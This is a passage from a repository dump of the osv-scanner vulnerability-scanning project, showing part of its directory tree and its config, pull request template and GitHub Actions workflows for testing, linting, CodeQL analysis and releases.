│ │ │ ├── json/ │ │ │ │ ├── govulncheckinput.json │ │ │ │ ├── input-no-call-data.json │ │ │ │ ├── input.json │ │ │ │ ├── output-no-call-data.json │ │ │ │ ├── output.json │ │ │ │ ├── vulnbyid-no-call-data.json │ │ │ │ └── vulnbyid.json │ │ │ └── rust/ │ │ │ ├── archives/ │ │ │ │ ├── medium.rlib │ │ │ │ └── simple.rlib │ │ │ ├── functions/ │ │ │ │ ├── medium.json │ │ │ │ ├── simple.json │ │ │ │ └── test-rust-2.json │ │ │ ├── objs/ │ │ │ │ ├── medium.o │ │ │ │ ├── simple.o │ │ │ │ └── test-rust-2 │ │ │ └── rust-project/ │ │ │ ├── .gitignore │ │ │ ├── Cargo.toml │ │ │ └── src/ │ │ │ └── main.rs │ │ └── testmain_test.go │ ├── spdx/ │ │ ├── gen.go │ │ ├── licenses.go │ │ ├── satisfies.go │ │ ├── satisfies_test.go │ │ ├── verify.go │ │ └── verify_test.go │ ├── testlogger/ │ │ ├── handler.go │ │ └── markers.go │ ├── testutility/ │ │ ├── fixture.go │ │ ├── jsonreplace.go │ │ ├── jsonreplace_test.go │ │ ├── mock_http.go │ │ ├── normalize.go │ │ ├── snapshot.go │ │ └── utility.go │ ├── thirdparty/ │ │ ├── ar/ │ │ │ ├── COPYING │ │ │ └── reader.go │ │ └── xml/ │ │ ├── atom_test.go │ │ ├── marshal.go │ │ ├── marshal_test.go │ │ ├── read.go │ │ ├── read_test.go │ │ ├── typeinfo.go │ │ ├── xml.go │ │ └── xml_test.go │ ├── tui/ │ │ ├── dependency-graph.go │ │ ├── in-place-info.go │ │ ├── relock-info.go │ │ ├── severity.go │ │ ├── styles.go │ │ ├── tui.go │ │ ├── vuln-info.go │ │ └── vuln-list.go │ ├── url/ │ │ ├── url.go │ │ ├── url_other_test.go │ │ ├── url_test.go │ │ └── url_windows_test.go │ ├── utility/ │ │ ├── depgroup/ │ │ │ └── devgroup.go │ │ ├── maven/ │ │ │ ├── maven.go │ │ │ ├── maven_test.go │ │ │ └── testdata/ │ │ │ ├── my-app/ │ │ │ │ └── pom.xml │ │ │ ├── parent/ │ │ │ │ └── pom.xml │ │ │ └── pom.xml │ │ ├── purl/ │ │ │ ├── composer.go │ │ │ ├── composer_test.go │ │ │ ├── golang.go │ │ │ ├── golang_test.go │ │ │ ├── maven.go │ │ │ ├── maven_test.go │ │ │ ├── package_grouper.go │ │ │ ├── package_grouper_test.go │ │ │ ├── purl.go │ │ │ ├── purl_to_package.go │ │ │ └── purl_to_package_test.go │ │ ├── results/ │ │ │ └── results.go │ │ ├── semverlike/ │ │ │ └── version-semver-like.go │ │ ├── severity/ │ │ │ ├── severity.go │ │ │ └── severity_test.go │ │ └── vulns/ │ │ ├── vulnerabilities.go │ │ ├── vulnerabilities_test.go │ │ ├── vulnerability.go │ │ └── vulnerability_test.go │ └── version/ │ └── version.go ├── osv-scanner.toml ├── pkg/ │ ├── models/ │ │ ├── cyclonedx.go │ │ ├── image.go │ │ ├── results.go │ │ └── results_test.go │ └── osvscanner/ │ ├── __snapshots__/ │ │ ├── filter_internal_test.snap │ │ ├── osvscanner_test.snap │ │ └── vulnerability_result_internal_test.snap │ ├── exclude.go │ ├── exclude_test.go │ ├── filter.go │ ├── filter_internal_test.go │ ├── internal/ │ │ ├── imagehelpers/ │ │ │ └── imagehelpers.go │ │ └── scanners/ │ │ └── lockfile.go │ ├── invsort.go │ ├── osvscanner.go │ ├── osvscanner_test.go │ ├── scan.go │ ├── scan_test.go │ ├── stats.go │ ├── testdata/ │ │ └── filter/ │ │ ├── .gitignore │ │ ├── all/ │ │ │ ├── configs/ │ │ │ │ ├── a/ │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── b/ │ │ │ │ │ └── osv-scanner.toml │ │ │ │ └── c/ │ │ │ │ └── osv-scanner.toml │ │ │ ├── input.json │ │ │ └── want.json │ │ ├── none/ │ │ │ ├── configs/ │ │ │ │ ├── a/ │ │ │ │ │ └── no_config │ │ │ │ ├── b/ │ │ │ │ │ └── osv-scanner.toml │ │ │ │ └── c/ │ │ │ │ └── osv-scanner.toml │ │ │ ├── input.json │ │ │ └── want.json │ │ └── some/ │ │ ├── configs/ │ │ │ ├── a/ │ │ │ │ └── osv-scanner.toml │ │ │ ├── b/ │ │ │ │ └── osv-scanner.toml │ │ │ └── c/ │ │ │ └── osv-scanner.toml │ │ ├── input.json │ │ └── want.json │ ├── testmain_test.go │ ├── vulnerability_result.go │ └── vulnerability_result_internal_test.go ├── renovate.json └── scripts/ ├── build.sh ├── build_snapshot.sh ├── build_test_images.sh ├── examples/ │ └── auto_guided_remediation.py ├── generate_coverage_report.sh ├── generate_mock_resolution_universe/ │ └── main.go ├── generators/ │ ├── GenerateMavenVersions.java │ ├── generate-alpine-versions.py │ ├── generate-cran-versions.R │ ├── generate-debian-versions.py │ ├── generate-packagist-versions.php │ ├── generate-pypi-versions.py │ ├── generate-redhat-versions.py │ └── generate-rubygems-versions.rb ├── report_uncleaned_snapshots.py ├── run_formatters.sh ├── run_lints.sh ├── run_local_docs.sh ├── run_tests.sh └── test_env.dockerfile ================================================ FILE CONTENTS ================================================ ================================================ FILE: .dockerignore ================================================ docs/vendor docs/_site dist/ .history/ ================================================ FILE: .editorconfig ================================================ # EditorConfig helps developers define and maintain consistent # coding styles between different editors and IDEs # editorconfig.org root = true [*] end_of_line = lf charset = utf-8 trim_trailing_whitespace = true insert_final_newline = true indent_style = space indent_size = 2 [*.go] indent_style = tab [internal/output/testdata/*.md] trim_trailing_whitespace = false [Makefile] indent_style = tab ================================================ FILE: .gemini/config.yaml ================================================ have_fun: false code_review: disable: false comment_severity_threshold: MEDIUM max_review_comments: -1 pull_request_opened: help: false summary: false code_review: false include_drafts: true ignore_patterns: [] ================================================ FILE: .github/PULL_REQUEST_TEMPLATE/PULL_REQUEST_TEMPLATE.md ================================================ ## Overview **Please create an issue to discuss the proposed changes before sending a pull request.** A brief description of the changes in this pull request. What is the purpose of this PR? What issue does it fix? Fixes # (issue) ## Details Provide a more detailed description of the changes. This can include: - The approach taken to solve the problem. - Any technical details that are relevant to the review. - Before and after screenshots (if applicable). ## Testing Please describe the tests that you ran to verify your changes. For example: - I have added unit tests for the new functionality. - I have run the existing test suite and all tests pass. - I have manually tested the changes in the following way: ... ## Checklist - [ ] I have signed the [Contributor License Agreement](https://cla.developers.google.com/). - [ ] I have run the linter using `./scripts/run_lints.sh`. - [ ] I have run the unit tests using `./scripts/run_tests.sh`. - [ ] I have made my commits and PR title follow the [Conventional Commits](https://www.conventionalcommits.org/en/v1.0.0/) specification. ================================================ FILE: .github/workflows/cassettes.yml ================================================ name: Cassettes on: schedule: - cron: "47 20 * * *" workflow_dispatch: concurrency: # Pushing new changes to a branch will cancel any in-progress CI runs group: ${{ github.workflow }}-${{ github.ref }} cancel-in-progress: true # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: update: permissions: contents: write # to fetch and commit code actions: write # to manually dispatch checks on the pull request pull-requests: write # Create pull requests runs-on: ubuntu-latest steps: - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - run: ./scripts/run_tests.sh || true env: TEST_ACCEPTANCE: true TEST_VCR_MODE: recordonly UPDATE_SNAPS: always - uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0 with: token: ${{ secrets.PR_TOKEN_BOT }} title: "test: update cassettes" body: > The cassettes have changed, probably due to OSV advisories being changed. Please review the differences to make sure that they're expected! branch: "bot/update-cassettes" author: "osv-robot " commit-message: "test: update cassettes" ================================================ FILE: .github/workflows/checks.yml ================================================ # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. name: Checks on: push: branches: ["main", "v1", "mcp"] pull_request: # The branches below must be a subset of the branches above branches: ["main", "v1", "mcp"] workflow_dispatch: concurrency: # Pushing new changes to a branch will cancel any in-progress CI runs group: ${{ github.workflow }}-${{ github.ref }} cancel-in-progress: true # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: ensure_snapshots_are_being_cleaned: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - run: scripts/report_uncleaned_snapshots.py filenames: runs-on: ubuntu-latest steps: - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - run: | find . -mindepth 1 ! -regex '.*/[#@A-Za-z0-9._-]*' -print0 \ | xargs -0 -I{} bash -c \ 'printf "::error file=%q::This filename contains undesired characters\n" "$1" && false' _ {} format: permissions: contents: read # to fetch code (actions/checkout) name: prettier runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Run format action uses: ./.github/workflows/format-action tidy: permissions: contents: read # to fetch code (actions/checkout) name: go mod tidy runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - run: go mod tidy -diff lint: permissions: contents: read # to fetch code (actions/checkout) name: golangci-lint runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - name: Run lint action uses: ./.github/workflows/lint-action prepare_test_image_testdata: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - run: scripts/build_test_images.sh - uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0 with: name: image-testdata-${{ github.run_number }}-${{ github.run_attempt }} path: cmd/osv-scanner/scan/image/testdata/*.tar retention-days: 1 tests: permissions: contents: read # to fetch code (actions/checkout) needs: - prepare_test_image_testdata name: Run unit tests strategy: fail-fast: false matrix: os: [ubuntu-latest, macos-latest, windows-latest] runs-on: ${{ matrix.os }} steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8.0.1 with: pattern: image-testdata-${{ github.run_number }}-* path: cmd/osv-scanner/scan/image/testdata/ - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - name: Run test action uses: ./.github/workflows/test-action with: codecov_token: ${{ secrets.CODECOV_TOKEN }} docker: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest env: # Required for buildx on docker 19.x DOCKER_CLI_EXPERIMENTAL: "enabled" steps: - name: Checkout uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: fetch-depth: 0 - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - uses: docker/setup-qemu-action@ce360397dd3f832beb865e1373c09c0e9f86d70a # v4.0.0 - uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4.0.0 - name: Run GoReleaser id: run-goreleaser uses: goreleaser/goreleaser-action@ec59f474b9834571250b370d4735c50f8e2d1e29 # v7.0.0 with: distribution: goreleaser version: "~> v2" args: release --clean --snapshot - env: ARTIFACTS: ${{ steps.run-goreleaser.outputs.artifacts }} run: | echo "$ARTIFACTS" > output.json jq -r '.[] | select( .type == "Docker Image" and .goarch == "amd64" and .goos == "linux" and .extra.DockerConfig.dockerfile == "goreleaser.dockerfile" ) | .name' output.json | while read -r image; do echo "Testing image $image" exit_code=0 docker run -v ${PWD}:/src $image -L /src/go.mod || exit_code=$? # fail if we get a non-zero exit code other than "vulnerabilities were found" if [[ $exit_code -ne 0 && $exit_code -ne 1 ]]; then exit $exit_code fi done ================================================ FILE: .github/workflows/codeql-analysis.yml ================================================ # For most projects, this workflow file will not need changing; you simply need # to commit it to your repository. # # You may wish to alter this file to override the set of languages analyzed, # or to provide custom queries or build logic. # # ******** NOTE ******** # We have attempted to detect the languages in your repository. Please check # the `language` matrix defined below to confirm you have the correct set of # supported CodeQL languages. # name: "CodeQL" on: push: branches: [main, v1] pull_request: # The branches below must be a subset of the branches above branches: [main, v1] # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: analyze: name: Analyze runs-on: ubuntu-latest permissions: actions: read contents: read security-events: write strategy: fail-fast: false matrix: language: ["go"] # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ] # Learn more about CodeQL language support at https://git.io/codeql-language-support steps: - name: Checkout repository uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 # Update go to the latest version to support minor go versions is go.mod file - name: Install Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: go.mod # Initializes the CodeQL tools for scanning. - name: Initialize CodeQL uses: github/codeql-action/init@b1bff81932f5cdfc8695c7752dcee935dcd061c8 # v4.33.0 with: languages: ${{ matrix.language }} # If you wish to specify custom queries, you can do so here or in a config file. # By default, queries listed here will override any specified in a config file. # Prefix the list here with "+" to use these queries and those in the config file. # queries: ./path/to/local/query, your-org/your-repo/queries@main # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). # If this step fails, then you should remove it and run the build manually (see below) - name: Autobuild uses: github/codeql-action/autobuild@b1bff81932f5cdfc8695c7752dcee935dcd061c8 # v4.33.0 # ℹ️ Command-line programs to run using the OS shell. # 📚 https://git.io/JvXDl # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines # and modify them (or add more) to build your code if your project # uses a compiled language #- run: | # make bootstrap # make release - name: Perform CodeQL Analysis uses: github/codeql-action/analyze@b1bff81932f5cdfc8695c7752dcee935dcd061c8 # v4.33.0 ================================================ FILE: .github/workflows/dependencies.yml ================================================ name: Dependencies on: schedule: - cron: "47 18 * * *" workflow_dispatch: concurrency: # Pushing new changes to a branch will cancel any in-progress CI runs group: ${{ github.workflow }}-${{ github.ref }} cancel-in-progress: true # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: update: permissions: contents: write # to fetch and commit code actions: write # to manually dispatch checks on the pull request pull-requests: write # Create pull requests runs-on: ubuntu-latest steps: - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - run: | latest_commit=$(git ls-remote https://github.com/google/osv-scalibr.git HEAD | cut -f1) echo "updating osv-scalibr to $latest_commit" go get github.com/google/osv-scalibr@"$latest_commit" echo "latest_scalibr_commit=$latest_commit" >> "$GITHUB_ENV" go mod tidy - run: go test ./cmd/osv-scanner/ -run 'Test_run$' || true env: TEST_ACCEPTANCE: true TEST_VCR_MODE: replaywithnewepisodes UPDATE_SNAPS: always - uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0 with: token: ${{ secrets.PR_TOKEN_BOT }} title: "feat: update osv-scalibr" body: > This updates `osv-scalibr` to https://github.com/google/osv-scalibr/commit/${{ env.latest_scalibr_commit }} branch: "bot/update-scalibr" author: "osv-robot " commit-message: "feat: update osv-scalibr to ${{ env.latest_scalibr_commit }}" delete-branch: true ================================================ FILE: .github/workflows/format-action/action.yml ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. name: format description: "Runs file formatters" runs: using: composite steps: - name: Run formatters shell: bash run: ./scripts/run_formatters.sh ================================================ FILE: .github/workflows/goreleaser-nightly.yml ================================================ name: Release nightly github action image on: schedule: # we want the nightly builds only on work days - cron: "0 0 * * 2-6" # Allow us to manually call the workflow workflow_dispatch: # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: goreleaser: outputs: hashes: ${{ steps.hash.outputs.hashes }} permissions: packages: write # for goreleaser/goreleaser-action to publish docker images runs-on: ubuntu-latest env: # Required for buildx on docker 19.x DOCKER_CLI_EXPERIMENTAL: "enabled" steps: - name: Checkout uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: fetch-depth: 0 persist-credentials: false - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - uses: docker/setup-qemu-action@ce360397dd3f832beb865e1373c09c0e9f86d70a # v4.0.0 - uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4.0.0 - name: ghcr-login uses: docker/login-action@b45d80f862d83dbcd57f89517bcf500b2ab88fb2 # v4.0.0 with: registry: ghcr.io username: ${{ github.repository_owner }} password: ${{ secrets.GITHUB_TOKEN }} - name: Run GoReleaser id: run-goreleaser uses: goreleaser/goreleaser-action@ec59f474b9834571250b370d4735c50f8e2d1e29 # v7.0.0 with: distribution: goreleaser version: "~> v2" # Essentially do a snapshot release, but still push the docker images # Skipping validate skips checks that the current commit has a tag args: release --clean --config .goreleaser-nightly.yml --skip validate,announce env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} ================================================ FILE: .github/workflows/goreleaser.yml ================================================ name: Release new version on: push: tags: - "*" # triggers only if push new tag version, like `v0.8.4` # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: goreleaser: outputs: hashes: ${{ steps.hash.outputs.hashes }} permissions: contents: write # for goreleaser/goreleaser-action to create a GitHub release packages: write # for goreleaser/goreleaser-action to publish docker images runs-on: ubuntu-latest env: # Required for buildx on docker 19.x DOCKER_CLI_EXPERIMENTAL: "enabled" steps: - name: Checkout uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: fetch-depth: 0 persist-credentials: false - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - uses: docker/setup-qemu-action@ce360397dd3f832beb865e1373c09c0e9f86d70a # v4.0.0 - uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4.0.0 - name: ghcr-login uses: docker/login-action@b45d80f862d83dbcd57f89517bcf500b2ab88fb2 # v4.0.0 with: registry: ghcr.io username: ${{ github.repository_owner }} password: ${{ secrets.GITHUB_TOKEN }} - name: Detect stable tag id: detect_stable # Extracts tag name from git ref and check tag is stable # semantic version pattern (vMAJOR.MINOR.PATCH, e.g., v1.2.3) run: | TAG="${GITHUB_REF_NAME}" if [[ "$TAG" =~ ^v[0-9]+\.[0-9]+\.[0-9]+$ ]]; then echo "STABLE=true" >> $GITHUB_ENV else echo "STABLE=false" >> $GITHUB_ENV fi - name: Run GoReleaser id: run-goreleaser uses: goreleaser/goreleaser-action@ec59f474b9834571250b370d4735c50f8e2d1e29 # v7.0.0 with: distribution: goreleaser version: "~> v2" args: release --clean env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} STABLE: ${{ env.STABLE }} - name: Generate subject id: hash env: ARTIFACTS: "${{ steps.run-goreleaser.outputs.artifacts }}" run: | set -euo pipefail checksum_file=$(echo "$ARTIFACTS" | jq -r '.[] | select (.type=="Checksum") | .path') echo "hashes=$(cat $checksum_file | base64 -w0)" >> "$GITHUB_OUTPUT" provenance: needs: [goreleaser] permissions: actions: read # To read the workflow path. id-token: write # To sign the provenance. contents: write # To add assets to a release. uses: slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@f7dd8c54c2067bafc12ca7a55595d5ee9b75204a # v2.1.0 with: base64-subjects: "${{ needs.goreleaser.outputs.hashes }}" upload-assets: true # upload to a new release draft-release: true # upload to a new draft release ================================================ FILE: .github/workflows/links.yml ================================================ name: Check markdown links on: push: paths: - "**.md" pull_request: paths: - "**.md" schedule: - cron: "45 22 * * 1,4" # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: check: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest steps: - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - uses: tcort/github-action-markdown-link-check@e7c7a18363c842693fadde5d41a3bd3573a7a225 # v1.1.2 with: use-quiet-mode: "yes" base-branch: "main" check-modified-files-only: ${{ github.event_name == 'schedule' && 'yes' || 'no'}} ================================================ FILE: .github/workflows/lint-action/action.yml ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. name: lint description: "Runs go lints" runs: using: composite steps: - name: Run golangci-lint uses: golangci/golangci-lint-action@1e7e51e771db61008b38414a730f564565cf7c20 # v9.2.0 with: version-file: .golangci-lint-version args: --timeout=5m ================================================ FILE: .github/workflows/osv-scanner-reusable-pr.yml ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # WARNING, this workflow is for legacy purposes. To view the current workflow see: https://github.com/google/osv-scanner-action name: OSV-Scanner PR scanning reusable # These are the permissions required by this reusable workflow to function. # # You should include a copy of this block next to any `uses:` of this workflow permissions: contents: read # to fetch code (actions/checkout) security-events: write # for uploading SARIF files (github/codeql-action/upload-sarif) on: workflow_call: inputs: scan-args: description: "Custom osv-scanner arguments (See https://google.github.io/osv-scanner/usage/ for options, you cannot set --format or --output-file)" type: string default: |- -r ./ results-file-name: description: "File name of the result SARIF file" type: string default: results.sarif upload-sarif: description: "Whether to upload to Security > Code Scanning" type: boolean required: false default: true fail-on-vuln: description: "Whether to fail the action on vulnerability found" type: boolean default: true jobs: scan-pr: runs-on: ubuntu-latest steps: - run: | echo "### This action is deprecated" >> $GITHUB_STEP_SUMMARY echo "Please use https://github.com/google/osv-scanner-action instead" >> $GITHUB_STEP_SUMMARY false ================================================ FILE: .github/workflows/osv-scanner-reusable.yml ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # WARNING, this workflow is for legacy purposes. To view the current workflow see: https://github.com/google/osv-scanner-action name: OSV-Scanner scanning reusable # These are the permissions required by this reusable workflow to function. # # You should include a copy of this block next to any `uses:` of this workflow permissions: contents: read # to fetch code (actions/checkout) security-events: write # for uploading SARIF files (github/codeql-action/upload-sarif) on: workflow_call: inputs: scan-args: description: "Custom osv-scanner arguments (See https://google.github.io/osv-scanner/usage/ for options, you cannot set --format or --output-file)" type: string default: |- -r ./ results-file-name: description: "File name of the result SARIF file" type: string default: results.sarif download-artifact: description: "Optional artifact to download for scanning" required: false default: "" type: string upload-sarif: description: "Whether to upload to Security > Code Scanning" type: boolean required: false default: true fail-on-vuln: description: "Whether to fail the action on vulnerability found" type: boolean default: true jobs: osv-scan: runs-on: ubuntu-latest steps: - run: | echo "### This action is deprecated" >> $GITHUB_STEP_SUMMARY echo "Please use https://github.com/google/osv-scanner-action instead" >> $GITHUB_STEP_SUMMARY false ================================================ FILE: .github/workflows/osv-scanner-unified-action.yml ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. name: OSV-Scanner Scheduled Scan on: pull_request: branches: ["main", "v1", "mcp"] schedule: - cron: "12 12 * * 1" push: branches: ["main", "v1", "mcp"] # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: scan-scheduled: permissions: contents: read # to fetch code (actions/checkout) security-events: write # for uploading SARIF files actions: read if: ${{ github.event_name == 'push' || github.event_name == 'schedule' }} # If you want to copy this config, highly suggest pinning this to a release rather than tracking the nightly branch. uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@nightly" scan-pr: permissions: contents: read # to fetch code (actions/checkout) security-events: write # for uploading SARIF files actions: read if: ${{ github.event_name == 'pull_request' || github.event_name == 'merge_group' }} # If you want to copy this config, highly suggest pinning this to a release rather than tracking the nightly branch. uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable-pr.yml@nightly" ================================================ FILE: .github/workflows/prerelease-check.yml ================================================ name: Pre-release check on: workflow_dispatch: inputs: version: description: "The version tag to release, (e.g. v1.2.3)" required: true type: string commit: description: "The commit hash to release" required: true type: string # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: osv-scan: permissions: contents: read # to fetch code (actions/checkout) security-events: write # for uploading SARIF files actions: read uses: google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@main with: # Only scan the top level go.mod file without recursively scanning directories since # this is pipeline is about releasing the go module and binary scan-args: |- ./ links: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest steps: - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - uses: tcort/github-action-markdown-link-check@e7c7a18363c842693fadde5d41a3bd3573a7a225 # v1.1.2 with: use-quiet-mode: "yes" base-branch: "main" format: permissions: contents: read # to fetch code (actions/checkout) name: prettier runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Run lint action uses: ./.github/workflows/format-action tidy: permissions: contents: read # to fetch code (actions/checkout) name: go mod tidy runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - run: go mod tidy -diff lint: permissions: contents: read # to fetch code (actions/checkout) name: golangci-lint runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false ref: ${{ inputs.commit }} - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - name: Run lint action uses: ./.github/workflows/lint-action prepare_test_image_testdata: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - run: scripts/build_test_images.sh - uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0 with: name: image-testdata-${{ github.run_number }}-${{ github.run_attempt }} path: cmd/osv-scanner/scan/image/testdata/*.tar retention-days: 1 tests: permissions: contents: read # to fetch code (actions/checkout) name: Run unit tests needs: - prepare_test_image_testdata strategy: fail-fast: false matrix: os: [ubuntu-latest, macos-latest, windows-latest] runs-on: ${{ matrix.os }} steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false ref: ${{ inputs.commit }} - uses: 